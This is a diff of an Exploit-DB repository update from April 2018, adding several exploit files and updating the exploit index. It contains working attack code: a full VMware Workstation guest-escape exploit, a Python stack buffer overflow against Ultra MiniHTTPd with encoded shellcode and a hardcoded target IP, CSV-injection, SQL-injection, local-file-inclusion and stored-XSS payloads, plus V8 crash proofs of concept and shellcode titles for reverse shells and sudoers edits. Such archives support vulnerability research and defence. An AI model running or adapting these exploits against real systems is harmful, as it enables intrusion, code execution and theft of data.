DB: 2018-04-26

12 changes to exploits/shellcodes

VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read
VMware Workstation 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read

Microsoft (Win 10) Internet Explorer 11.371.16299.0 - Denial Of Service
Microsoft Internet Explorer 11.371.16299.0 (Windows 10) - Denial Of Service
VMware Workstation 12.5.2 - Drag n Drop Use-After-Free (Pwn2Own 2017) (PoC)
Chrome V8 JIT - 'AwaitedPromise' Update Bug
Chrome V8 JIT - Arrow Function Scope Fixing Bug

Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow PoC

Shopy Point of Sale v1.0 - CSV Injection
Blog Master Pro v1.0 - CSV Injection
HRSALE The Ultimate HRM v1.0.2 - CSV Injection
HRSALE The Ultimate HRM v1.0.2 - 'award_id' SQL Injection
HRSALE The Ultimate HRM 1.0.2 - Authenticated Cross-Site Scripting
HRSALE The Ultimate HRM v1.0.2 - Local File Inclusion

Linux/x86 - Bind TCP (1337/TCP) Shell + Null-Free Shellcode (92 bytes)
Linux/x86 - Edit /etc/sudoers with NOPASSWD for ALL Shellcode
Linux/x86 - Reverse TCP (5555/TCP) Shellcode - (73 Bytes)
Linux/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 bytes)
Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access + Null-Free Shellcode (79 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:5555/TCP) Shell Shellcode (73 Bytes)
Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh Shellcode (74 bytes)
Linux/x86 - execve /bin/sh Shellcode Encoded with ROT-13 + RShift-2 + XOR Encoded (44 bytes)
Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes)
Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)

exploits/linux/webapps/44498.py

@@ -1,13 +1,11 @@
-# Exploit Title: Apache CouchDB JSON 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation
-# Date: 2017-08-07
-# Exploit Author: Sebastián Castro @r4wd3r
-# Vendor Homepage: https://blog.couchdb.org/2017/11/14/apache-couchdb-cve-2017-12635-and-cve-2017-12636/
-# Software Link: http://couchdb.apache.org/
-# Version: Apache CouchDB 1.7.0 and 2.x before 2.1.1
-# CVE : CVE-2017-12635
-
 #!/usr/bin/env python
 
+'''
+@author:        r4wd3r
+@license:       MIT License
+@contact:       r4wd3r@gmail.com
+'''
+
 import argparse
 import re
 import sys
@@ -60,7 +58,7 @@ except requests.exceptions.HTTPError:
     sys.exit(1)
 
 if rcu.status_code == 201:
-    print "[+] User " + user + " with password " + password + "successfully created."
+    print "[+] User " + user + " with password " + password + " successfully created."
     sys.exit(0)
 else:
-    print "[x] ERROR " + rcu.status_code + ": Unable to create the user on remote host."
+    print "[x] ERROR " + str(rcu.status_code) + ": Unable to create the user on remote host."

exploits/multiple/dos/44540.js

@@ -0,0 +1,70 @@
+/*
+Here's a snippet of AsyncGeneratorReturn. (https://cs.chromium.org/chromium/src/v8/src/builtins/builtins-async-generator-gen.cc?rcl=bcd1365cf7fac0d7897c43b377c143aae2d22f92&l=650)
+
+  Node* const context = Parameter(Descriptor::kContext);
+  Node* const outer_promise = LoadPromiseFromAsyncGeneratorRequest(req);
+  Node* const promise =
+      Await(context, generator, value, outer_promise, AwaitContext::kLength,
+            init_closure_context, var_on_resolve.value(), var_on_reject.value(),
+            is_caught);
+
+  CSA_SLOW_ASSERT(this, IsGeneratorNotSuspendedForAwait(generator));
+  StoreObjectField(generator, JSAsyncGeneratorObject::kAwaitedPromiseOffset,
+                   promise);
+
+The Await methods calls ResolveNativePromise which calls InternalResolvePromise which can invoke user JavaScript code through a "then" getter. If the AwaitedPromise is replaced by the user script, the AwaitedPromise will be immediately overwritten after the call to Await, this may lead the generator to an incorrect state.
+
+PoC:
+*/
+
+async function* asyncGenerator() {
+}
+
+let gen = asyncGenerator();
+gen.return({
+    get then() {
+        delete this.then;
+
+        gen.next();
+    }
+});
+
+/*
+Log in debug mode:
+abort: CSA_ASSERT failed: IsNotUndefined(request) [../../src/builtins/builtins-async-generator-gen.cc:328]
+
+
+==== JS stack trace =========================================
+
+Security context: 0x2b29083a3a71 <JSObject>#0#
+    2: /* anonymous */(this=0x19b7b0603721 <JSGlobal Object>#1#,0x19b7b060d139 <Object map = 0x189055388c91>#2#)
+
+==== Details ================================================
+
+[2]: /* anonymous */(this=0x19b7b0603721 <JSGlobal Object>#1#,0x19b7b060d139 <Object map = 0x189055388c91>#2#) {
+// optimized frame
+--------- s o u r c e   c o d e ---------
+<No Source>
+-----------------------------------------
+}
+==== Key         ============================================
+
+ #0# 0x2b29083a3a71: 0x2b29083a3a71 <JSObject>
+ #1# 0x19b7b0603721: 0x19b7b0603721 <JSGlobal Object>
+ #2# 0x19b7b060d139: 0x19b7b060d139 <Object map = 0x189055388c91>
+=====================
+
+Received signal 4 ILL_ILLOPN 7fb143ae2781
+
+==== C stack trace ===============================
+
+ [0x7fb143ae643e]
+ [0x7fb143ae6395]
+ [0x7fb1436ce390]
+ [0x7fb143ae2781]
+ [0x7fb1430f23ae]
+ [0x7fb1430f1ef7]
+ [0x1c8e08204384]
+[end of stack trace]
+Illegal instruction
+*/

exploits/multiple/dos/44541.js

@@ -0,0 +1,41 @@
+/*
+When the parser parses the parameter list of an arrow function contaning destructuring assignments, it can't distinguish whether the assignments will be actually in the parameter list or just assignments until it meets a "=>" token. So it first assigns the destructuring assignments to the outer scope, and fixs the scope when it meets the "=>" token.
+
+Here's the methods used to fix the scope (https://cs.chromium.org/chromium/src/v8/src/parsing/parser-base.h?rcl=787ecbb389741d2b76131f9fa526374a0dbfcff6&l=407).
+
+    void RewindDestructuringAssignments(int pos) {
+      destructuring_assignments_to_rewrite_.Rewind(pos);
+    }
+
+    void SetDestructuringAssignmentsScope(int pos, Scope* scope) {
+      for (int i = pos; i < destructuring_assignments_to_rewrite_.length();
+           ++i) {
+        destructuring_assignments_to_rewrite_[i]->set_scope(scope);
+      }
+    }
+
+Since the SetDestructuringAssignmentsScope method changes the scope from "pos" to the end of the list, it needs to call the RewindDestructuringAssignments method after fixing the scope. But the RewindDestructuringAssignments method is only called when the arrow function's body starts with a "{" token (https://cs.chromium.org/chromium/src/v8/src/parsing/parser-base.h?rcl=787ecbb389741d2b76131f9fa526374a0dbfcff6&l=4418).
+
+So it can't properly handle the following case where a destructuring assignment expression containing a single line arrow function. It will set the scope of the inner destructuring assignments to the outer arrow function's scope.
+
+PoC:
+*/
+
+(({a = (async ({b = {a = c} = {
+    a: 0x1234
+}}) => 1)({})}, c) => 1)({});
+
+/*
+Log:
+Received signal 10 BUS_ADRERR 12340000001f
+
+==== C stack trace ===============================
+
+ [0x00010edde85e]
+ [0x7fff53e54f5a]
+ [0x000000000000]
+ [0x7eb48331b6d8]
+ [0x7eb48331b6d8]
+[end of stack trace]
+Bus error: 10
+*/

exploits/php/webapps/44534.txt

@@ -0,0 +1,32 @@
+# Exploit Title: Shopy Point of Sale v1.0 - CSV Injection
+# Date: 2018-04-23
+# Exploit Author: 8bitsec
+# CVE: CVE-2018-10258
+# Vendor Homepage: https://codecanyon.net/
+# Software Link: https://codecanyon.net/item/shopy-point-of-sales/21730225
+# Version: 1.0
+# Tested on: [Kali Linux 2.0 | Mac OS 10.13]
+
+Release Date:
+=============
+2018-04-23
+
+Product & Service Introduction:
+===============================
+Point of sale for retail stores
+
+Technical Details & Description:
+================================
+
+A user is able to inject a command that will be included in the exported CSV file.
+
+Proof of Concept (PoC):
+=======================
+
+1. Login with Sales user's credentials
+2. Browse to Trader > Customer > New Customer and add =cmd|'/C calc'!A1 into the Customer Name field
+3. Log in with admin's credentials
+4. Browse to Sales > Create Invoice to create an invoice for that user
+5. Browse to All Invoice > Export to download and open the exported CSV file
+
+==================

exploits/php/webapps/44535.txt

@@ -0,0 +1,31 @@
+# Exploit Title: Blog Master Pro v1.0 - CSV Injection
+# Date: 2018-04-23
+# Exploit Author: 8bitsec
+# CVE: CVE-2018-10255
+# Vendor Homepage: https://codecanyon.net/
+# Software Link: https://codecanyon.net/item/blog-master-pro/21689781
+# Version: 1.0
+# Tested on: [Kali Linux 2.0 | Mac OS 10.13]
+
+Release Date:
+=============
+2018-04-23
+
+Product & Service Introduction:
+===============================
+This application based on new Latest Laravel 5.5 Framework that allows web site owners to quickly add blog post, manage author and user, manage comments, manage website, manage profile and allow to create category and tag. 
+It is designed latest security and code standards and it is ready for high availability web sites.
+
+Technical Details & Description:
+================================
+
+A user is able to inject a command that will be included in the exported CSV file.
+
+Proof of Concept (PoC):
+=======================
+
+1. Login with regular user's credentials
+2. Add =cmd|'/C calc'!A1 as a comment on any article
+3. Log in with admin's credentials
+4. Browse to Dashboard > Comments
+5. Click on the CSV button to download and open the exported CSV file

exploits/php/webapps/44536.txt

@@ -0,0 +1,30 @@
+# Exploit Title: HRSALE The Ultimate HRM 1.0.2 - CSV Injection
+# Date: 2018-04-23
+# Exploit Author: 8bitsec
+# CVE: CVE-2018-10257
+# Vendor Homepage: https://codecanyon.net/
+# Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619
+# Version: 1.0.2
+# Tested on: [Kali Linux 2.0 | Mac OS 10.13]
+
+Release Date:
+=============
+2018-04-23
+
+Product & Service Introduction:
+===============================
+HRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.
+
+Technical Details & Description:
+================================
+
+A user is able to inject a command that will be included in the exported CSV file.
+
+Proof of Concept (PoC):
+=======================
+
+1. Login with employee user credentials
+2. Browse to My Profile and add =cmd|'/C calc'!A1 into the First Name field
+3. Log in with admin's credentials
+4. Browse to Core HR > Employees Last Login
+5. Click on the CSV button to download and open the exported CSV file

exploits/php/webapps/44537.txt

@@ -0,0 +1,33 @@
+# Exploit Title: HRSALE The Ultimate HRM v1.0.2 - 'award_id' SQL Injection
+# Date: 2018-04-23
+# Exploit Author: 8bitsec
+# CVE: CVE-2018-10256
+# Vendor Homepage: https://codecanyon.net/
+# Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619
+# Version: 1.0.2
+# Tested on: [Kali Linux 2.0 | Mac OS 10.13]
+
+Release Date:
+=============
+2018-04-23
+
+Product & Service Introduction:
+===============================
+HRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.
+
+Technical Details & Description:
+================================
+
+SQL injection on [award_id] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+https://localhost/[path]/admin/user/read_awards/?jd=1&is_ajax=1&mode=modal&data=view_award&award_id=1' AND 1303=1303 AND 'BzpS'='BzpS
+
+Parameter: award_id (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: jd=1&is_ajax=1&mode=modal&data=view_award&award_id=1' AND 1303=1303 AND 'BzpS'='BzpS

exploits/php/webapps/44538.txt

@@ -0,0 +1,29 @@
+# Exploit Title: HRSALE The Ultimate HRM 1.0.2 - Authenticated Cross Site Scripting
+# Date: 2018-04-23
+# Exploit Author: 8bitsec
+# CVE: CVE-2018-10259
+# Vendor Homepage: https://codecanyon.net/
+# Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619
+# Version: 1.0.2
+# Tested on: [Kali Linux 2.0 | Mac OS 10.13]
+
+Release Date:
+=============
+2018-04-23
+
+Product & Service Introduction:
+===============================
+HRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.
+
+Technical Details & Description:
+================================
+
+Authenticated Stored XSS vulnerability found logged as low privileged user.
+
+Proof of Concept (PoC):
+=======================
+
+Authenticated Stored XSS:
+
+Dashboard > My Profile. Write the payload on the 'First Name' input field:
+john doe<script>alert()</script>

exploits/php/webapps/44539.txt

@@ -0,0 +1,28 @@
+# Exploit Title: HRSALE The Ultimate HRM v1.0.2 - Local File Inclusion
+# Date: 2018-04-23
+# Exploit Author: 8bitsec
+# CVE: CVE-2018-10260
+# Vendor Homepage: https://codecanyon.net/
+# Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619
+# Version: 1.0.2
+# Tested on: [Kali Linux 2.0 | Mac OS 10.13]
+
+Release Date:
+=============
+2018-04-23
+
+Product & Service Introduction:
+===============================
+HRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.
+
+Technical Details & Description:
+================================
+
+Local File Inclusion vulnerability found logged as low privileged user.
+
+Proof of Concept (PoC):
+=======================
+
+LFI:
+
+http://localhost/[path]/admin/download?type=task&filename=../../../../../../../../etc/passwd

exploits/windows/dos/44525.py

@@ -106,10 +106,8 @@ payload=('<br>\n'+
 'Tested successfully on Windows 10\n'+
 '</center><script>\n'
 'function doit(){\n'+
-'document.getElementById("hate").click();\n'
+'document.getElementById("hate").click();\n'+
 'alert("DOH!");\n'+
-'obj.click();\n'+
-'obj.click();\n'+
 '}\n'+
 'setInterval("doit()", 2000)\n'+
 '</script>')
@@ -122,7 +120,6 @@ print 'MS InternetExplorer (Win 10) '
 print 'Denial Of Service File Created.'
 print 'hyp3rlinx'
 
-
 '''
 Network Access:
 ===============

exploits/windows/dos/44533.c

@@ -0,0 +1,202 @@
+char *initial_dnd = "tools.capability.dnd_version 4";
+static const int cbObj = 0x100;
+char *second_dnd = "tools.capability.dnd_version 2";
+char *chgver = "vmx.capability.dnd_version";
+char *call_transport = "dnd.transport ";
+char *readstring = "ToolsAutoInstallGetParams";
+typedef struct _DnDCPMsgHdrV4
+{
+    char magic[14];
+    char dummy[2];
+    size_t ropper[13];
+    char shellcode[175];
+    char padding[0x80];
+} DnDCPMsgHdrV4;
+
+
+void PrepareLFH()
+{
+    char *result = NULL;
+    char *pObj = malloc(cbObj);
+    memset(pObj, 'A', cbObj);
+    pObj[cbObj - 1] = 0;
+    for (int idx = 0; idx < 1; ++idx) // just occupy 1
+    {
+        char *spary = stringf("info-set guestinfo.k%d %s", idx, pObj);
+        RpcOut_SendOneRaw(spary, strlen(spary), &result, NULL); //alloc one to occupy 4
+    }
+    free(pObj);
+}
+
+size_t infoleak()
+{
+#define MAX_LFH_BLOCK 512
+    Message_Channel *chans[5] = {0};
+    for (int i = 0; i < 5; ++i)
+    {
+        chans[i] = Message_Open(0x49435052);
+        if (chans[i])
+        {
+            Message_SendSize(chans[i], cbObj - 1); //just alloc
+        }
+        else
+        {
+            Message_Close(chans[i - 1]); //keep 1 channel valid
+            chans[i - 1] = 0;
+            break;
+        }
+    }
+    PrepareLFH(); //make sure we have at least 7 hole or open and occupy next LFH block
+    for (int i = 0; i < 5; ++i)
+    {
+        if (chans[i])
+        {
+            Message_Close(chans[i]);
+        }
+    }
+
+    char *result = NULL;
+    char *pObj = malloc(cbObj);
+    memset(pObj, 'A', cbObj);
+    pObj[cbObj - 1] = 0;
+    char *spary2 = stringf("guest.upgrader_send_cmd_line_args %s", pObj);
+    while (1)
+    {
+        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
+        {
+            RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
+            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
+            RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
+            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
+        }
+
+        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
+        {
+            Message_Channel *chan = Message_Open(0x49435052);
+            if (chan == NULL)
+            {
+                puts("Message send error!");
+                Sleep(100);
+            }
+            else
+            {
+                Message_SendSize(chan, cbObj - 1);
+                Message_RawSend(chan, "\xA0\x75", 2); //just ret
+                Message_Close(chan);
+            }
+        }
+        Message_Channel *chan = Message_Open(0x49435052);
+        Message_SendSize(chan, cbObj - 1);
+        Message_RawSend(chan, "\xA0\x74", 2);                                 //free
+        RpcOut_SendOneRaw(dndtransport, strlen(dndtransport), &result, NULL); //trigger double free
+        for (int i = 0; i < min(cbObj-3,MAX_LFH_BLOCK); ++i)
+        {
+            RpcOut_SendOneRaw(spary2, strlen(spary2), &result, NULL);
+            Message_RawSend(chan, "B", 1);
+            RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
+            if (result[0] == 'A' && result[1] == 'A' && strcmp(result, pObj))
+            {
+               Message_Close(chan); //free the string
+                for (int i = 0; i < MAX_LFH_BLOCK; ++i)
+                {
+                    puts("Trying to leak vtable");
+                    RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
+                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
+                    RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
+                    size_t p = 0;
+                    if (result)
+                    {
+                        memcpy(&p, result, min(strlen(result), 8));
+                        printf("Leak content: %p\n", p);
+                    }
+                    size_t low = p & 0xFFFF;
+                    if (low == 0x74A8 || //RpcBase
+                        low == 0x74d0 || //CpV4
+                        low == 0x7630)   //DnDV4
+                    {
+                        printf("vmware-vmx base: %p\n", (p & (~0xFFFF)) - 0x7a0000);
+                        return (p & (~0xFFFF)) - 0x7a0000;
+                    }
+                    RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
+                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
+                }
+            }
+        }
+        Message_Close(chan);
+    }
+    return 0;
+}
+
+void exploit(size_t base)
+{
+    char *result = NULL;
+    char *uptime_info = stringf("SetGuestInfo -7-%I64u", 0x41414141);
+    char *pObj = malloc(cbObj);
+    memset(pObj, 0, cbObj);
+
+    DnDCPMsgHdrV4 *hdr = malloc(sizeof(DnDCPMsgHdrV4));
+    memset(hdr, 0, sizeof(DnDCPMsgHdrV4));
+    memcpy(hdr->magic, call_transport, strlen(call_transport));
+    while (1)
+    {
+        RpcOut_SendOneRaw(second_dnd, strlen(second_dnd), &result, NULL);
+        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
+        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
+        {
+            Message_Channel *chan = Message_Open(0x49435052);
+            Message_SendSize(chan, cbObj - 1);
+            size_t fake_vtable[] = {
+                base + 0xB87340,
+                base + 0xB87340,
+                base + 0xB87340,
+                base + 0xB87340};
+
+            memcpy(pObj, &fake_vtable, sizeof(size_t) * 4);
+
+            Message_RawSend(chan, pObj, sizeof(size_t) * 4);
+            Message_Close(chan);
+        }
+        RpcOut_SendOneRaw(uptime_info, strlen(uptime_info), &result, NULL);
+        RpcOut_SendOneRaw(hdr, sizeof(DnDCPMsgHdrV4), &result, NULL);
+        //check pwn success?
+        RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
+        if (*(size_t *)result == 0xdeadbeefc0debabe)
+        {
+            puts("VMware escape success! \nPwned by KeenLab, Tencent");
+            RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);//fix dnd to callable prevent vmtoolsd problem
+            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
+            return;
+        }
+        //host dndv4 fill in, try to clean up and free again
+        Sleep(100);
+        puts("Object wrong! Retry...");
+        RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);
+        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
+    }
+}
+
+int main(int argc, char *argv[])
+{
+    int ret = 1;
+    __try
+    {
+        while (1)
+        {
+            size_t base = 0;
+            do
+            {
+                puts("Leaking...");
+                base = infoleak();
+            } while (!base);
+            puts("Pwning...");
+            exploit(base);
+            break;
+        }
+    }
+    __except (ExceptionIsBackdoor(GetExceptionInformation()) ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)
+    {
+        fprintf(stderr, NOT_VMWARE_ERROR);
+        return 1;
+    }
+    return ret;
+}

exploits/windows_x86/local/44472.py

@@ -0,0 +1,61 @@
+# Exploit Title: Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow
+# Date: 2018-04-14
+# Exploit Author: jollymongrel
+# Vendor Homepage: http://www.vector.co.jp
+# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
+# Version: 1.2
+# Tested on: Windows 7 32-bit
+# CVE : CVE-2013-5019
+
+import sys
+import socket
+import struct
+
+eip = struct.pack('I', 0x764046cd) #call esp [msvcrt.dll]
+
+#windows/exec - 274 bytes
+#http://www.metasploit.com
+#Encoder: x86/shikata_ga_nai
+#EXITFUNC=thread
+#CMD=calc.exe
+#badchars='\x00\x09\x0a\x0b\x0c\x0d\x20\x2f\x3f'
+shellcode = ("no0bno0b"+"\xb8\x21\xa0\xa2\xbd\xdb\xd1\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
+"\x3e\x31\x43\x15\x83\xc3\x04\x03\x43\x11\xe2\xd4\x1a\x51\xd8"
+"\x25\xbd\x4c\xf4\x90\x35\x55\x0f\x79\x9f\x5c\x5e\x45\x5c\xb5"
+"\x5d\x84\x31\x44\x9d\x46\xde\x89\xb2\x1a\x92\xe6\x1d\x26\x1d"
+"\xa1\xb0\xfa\x6c\x5a\x1e\xf7\xb7\xb6\xfb\x71\xbf\x2a\x51\xb6"
+"\x2a\x53\x27\x2a\x43\x49\x67\xe7\x66\x6a\x6e\xe3\x10\x46\x27"
+"\xe5\x1f\xc5\xb5\xad\x32\x57\x38\xd3\x66\xa8\xa7\xf8\xe0\xfc"
+"\x1a\x33\xce\x22\xf0\xad\x34\xff\x3a\x42\x91\x07\x6d\xe5\xf1"
+"\x79\x73\xa3\xe9\xbf\xd7\xbf\xa7\x10\x06\xf2\x2c\x81\x6a\xa0"
+"\x97\x46\xae\xe7\x33\x1c\x87\x02\x5d\x8d\xd7\x5a\xbe\x7c\xa9"
+"\x96\x7f\x04\xbd\xe4\xb5\xbc\xa0\xf5\xf3\x12\x66\x6c\xbc\xb7"
+"\xb2\x49\x01\x66\xd3\x8f\x40\x5b\x33\x07\x22\x30\x0e\x11\xc6"
+"\x89\xfa\xbc\x18\x0f\x33\x18\xb1\x01\xe0\x53\x4a\x23\xab\x77"
+"\x17\x7f\xf8\x4f\xdd\x01\x79\x04\xa6\x82\xe0\xc4\x33\x06\x12"
+"\x36\x43\x2d\xc6\x8a\xfb\x24\x67\x4a\xc6\x5a\x4a\x4c\x97\x4c"
+"\x1b\x68\x98\xf8\x45\x2d\x86\x43\xbe\x0e\x96\x8f\xca\x89\x7e"
+"\x5b\xe1\x8b\xb2\x5f\xd0\x94\xdf\x5e\x7c\x0e\x25\xa5\xf7\xea"
+"\x9d\x1b\xa9\x58\x50\x3a\xb8\x77\x16\xb1\x87\x48\x94\x37\x87"
+"\x9a\x9d\xe2\xd0")
+
+#egg hunter to search for no0bno0b
+egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+"\xef\xb8\x6e\x6f\x30\x62\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
+
+payload = "A" * 537
+payload += shellcode
+payload += "A" * (967 - len(payload))
+payload += eip
+payload += egghunter
+payload += "\xff\xe7" #jmp edi
+payload += "C" * (1007 - len(payload))
+
+print "[+] sending payload, length", len(payload)
+
+buf = "GET /"+payload+"HTTP/1.1\r\n\r\n"
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(("192.168.32.175", 80))
+s.send(buf)
+data = s.recv(1024)
+s.close()

files_exploits.csv

@@ -4404,7 +4404,7 @@ id,file,description,date,author,type,platform,port
 35173,exploits/linux/dos/35173.txt,"Minix 3.3.0 - Local Denial of Service (PoC)",2014-11-06,nitr0us,dos,linux,
 35178,exploits/windows/dos/35178.py,"i.Hex 0.98 - Local Crash (PoC)",2014-11-06,metacom,dos,windows,
 35179,exploits/windows/dos/35179.py,"i.Mage 1.11 - Local Crash (PoC)",2014-11-06,metacom,dos,windows,
-35182,exploits/windows_x86/dos/35182.txt,"VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read",2014-11-06,KoreLogic,dos,windows_x86,
+35182,exploits/windows_x86/dos/35182.txt,"VMware Workstation 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read",2014-11-06,KoreLogic,dos,windows_x86,
 35202,exploits/windows/dos/35202.py,"Microsoft Internet Explorer 11 - Denial of Service",2014-11-10,"Behrooz Abbassi",dos,windows,
 35217,exploits/windows/dos/35217.txt,"CorelDRAW X7 CDR File - 'CdrTxt.dll' Off-by-One Stack Corruption",2014-11-12,LiquidWorm,dos,windows,
 35240,exploits/linux/dos/35240.c,"acpid 1.0.x - Multiple Local Denial of Service Vulnerabilities",2011-01-19,"Vasiliy Kulikov",dos,linux,
@@ -5945,12 +5945,15 @@ id,file,description,date,author,type,platform,port
 44519,exploits/linux/dos/44519.txt,"gif2apng 1.9 - '.gif' Stack Buffer Overflow",2018-04-24,Hamm3r.py,dos,linux,
 44514,exploits/windows/dos/44514.py,"VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 - Memory Corruption (PoC)",2018-04-24,SivertPL,dos,windows,
 44521,exploits/linux/dos/44521.py,"Kaspersky KSN for Linux 5.2 - Memory Corruption",2018-04-24,"Juan Sacco",dos,linux,
-44525,exploits/windows/dos/44525.py,"Microsoft (Win 10) Internet Explorer 11.371.16299.0 - Denial Of Service",2018-04-24,hyp3rlinx,dos,windows,
+44525,exploits/windows/dos/44525.py,"Microsoft Internet Explorer 11.371.16299.0 (Windows 10) - Denial Of Service",2018-04-24,hyp3rlinx,dos,windows,
 44526,exploits/multiple/dos/44526.txt,"Adobe Flash - Overflow when Playing Sound",2018-04-24,"Google Security Research",dos,multiple,
 44527,exploits/multiple/dos/44527.txt,"Adobe Flash - Overflow in Slab Rendering",2018-04-24,"Google Security Research",dos,multiple,
 44528,exploits/multiple/dos/44528.txt,"Adobe Flash - Info Leak in Image Inflation",2018-04-24,"Google Security Research",dos,multiple,
 44529,exploits/multiple/dos/44529.txt,"Adobe Flash - Out-of-Bounds Write in blur Filtering",2018-04-24,"Google Security Research",dos,multiple,
 44530,exploits/multiple/dos/44530.js,"Chrome V8 JIT - 'NodeProperties::InferReceiverMaps' Type Confusion",2018-04-24,"Google Security Research",dos,multiple,
+44533,exploits/windows/dos/44533.c,"VMware Workstation 12.5.2 - Drag n Drop Use-After-Free (Pwn2Own 2017) (PoC)",2018-04-23,keenlab,dos,windows,
+44540,exploits/multiple/dos/44540.js,"Chrome V8 JIT - 'AwaitedPromise' Update Bug",2018-04-25,"Google Security Research",dos,multiple,
+44541,exploits/multiple/dos/44541.js,"Chrome V8 JIT - Arrow Function Scope Fixing Bug",2018-04-25,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9670,6 +9673,7 @@ id,file,description,date,author,type,platform,port
 44452,exploits/linux/local/44452.py,"GNU Beep 1.3 - 'HoleyBeep' Local Privilege Escalation",2018-04-06,Pirhack,local,linux,
 44455,exploits/windows/local/44455.py,"SysGauge Pro 4.6.12 - Local Buffer Overflow (SEH)",2018-04-16,"Hashim Jawad",local,windows,
 44470,exploits/windows/local/44470.py,"CloudMe Sync 1.11.0 - Local Buffer Overflow",2018-04-16,"Prasenjit Kanti Paul",local,windows,
+44472,exploits/windows_x86/local/44472.py,"Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow PoC",2018-04-17,jollymongrel,local,windows_x86,
 44474,exploits/windows/local/44474.txt,"Brave Browser < 0.13.0 -  'long alert() argument' Denial of Service",2018-04-17,"Sahil Tikoo",local,windows,
 44475,exploits/windows/local/44475.txt,"Brave Browser < 0.13.0 -  'window.close(self)' Denial of Service",2018-04-17,"Sahil Tikoo",local,windows,
 44476,exploits/windows/local/44476.py,"AMD Plays.tv 1.27.5.0 - 'plays_service.exe' Arbitrary File Execution",2018-04-15,Securifera,local,windows,
@@ -39194,6 +39198,7 @@ id,file,description,date,author,type,platform,port
 44454,exploits/php/webapps/44454.txt,"Cobub Razor 0.8.0 - SQL injection",2018-04-16,Kyhvedn,webapps,php,80
 44469,exploits/jsp/webapps/44469.txt,"Sophos Cyberoam UTM CR25iNG - 10.6.3 MR-5 - Direct Object Reference",2018-04-16,Frogy,webapps,jsp,
 44471,exploits/php/webapps/44471.txt,"Joomla! Component jDownloads 3.2.58 - Cross Site Scripting",2018-04-17,"Sureshbabu Narvaneni",webapps,php,
+44534,exploits/php/webapps/44534.txt,"Shopy Point of Sale v1.0 - CSV Injection",2018-04-25,8bitsec,webapps,php,
 44483,exploits/php/webapps/44483.txt,"MySQL Squid Access Report 2.1.4 - SQL Injection / Cross-Site Scripting",2018-04-18,"Keerati T.",webapps,php,80
 44484,exploits/php/webapps/44484.txt,"Rvsitebuilder CMS - Database Backup Download",2018-04-18,"Hesam Bazvand",webapps,php,
 44486,exploits/php/webapps/44486.txt,"Match Clone Script 1.0.4 - Cross-Site Scripting",2018-04-18,ManhNho,webapps,php,80
@@ -39216,3 +39221,8 @@ id,file,description,date,author,type,platform,port
 44515,exploits/php/webapps/44515.py,"Ericsson-LG iPECS NMS A.1Ac - Cleartext Credential Disclosure",2018-04-24,"Berk Cem Göksel",webapps,php,
